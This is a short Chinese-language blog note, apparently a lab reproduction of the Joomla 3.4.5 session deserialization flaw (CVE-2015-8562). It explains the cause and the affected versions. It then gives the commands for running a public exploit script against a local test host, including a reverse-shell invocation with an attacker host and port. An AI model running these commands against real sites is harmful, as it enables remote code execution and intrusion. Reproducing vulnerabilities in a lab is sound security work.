Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
阿新 • • 發佈:2021-08-29
Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)
2021年8月22日
21:22
漏洞介紹:
本漏洞根源是PHP5.6.13前的版本在讀取儲存好的session時,如果反序列化出錯則會跳過當前一段資料而去反序列化下一段資料。而Joomla將session儲存在Mysql資料庫中,編碼是utf8,當我們插入4位元組的utf8資料時則會導致截斷。截斷後的資料在反序列化時就會失敗,最後觸發反序列化漏洞。
通過Joomla中的Gadget,可造成任意程式碼執行的結果。
漏洞影響版本:
Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45
漏洞復現(環境需要自行安裝):
安裝完成之後,是這樣的效果:
直接使用相關的exp工具:
E:\A-note-note\漏洞復現\Joomla 3.4.5 反序列化漏洞(CVE-2015-8562)\rusty_joomla_rce
python3 rusty_joomla_exploit.py -t http://192.168.31.70:8080/
之後直接反彈shell:
python3 rusty_joomla_exploit.py -t http://192.168.31.70:8080/ --exploit --lhost 192.168.31.244 --lport 6666
返回了shell: